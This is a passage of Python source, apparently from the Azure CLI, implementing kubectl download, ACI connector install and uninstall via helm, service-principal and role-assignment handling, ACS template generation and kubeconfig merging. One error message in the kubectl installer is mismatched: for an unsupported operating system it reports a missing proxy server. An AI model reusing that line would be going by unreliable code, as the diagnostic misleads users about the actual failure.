os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
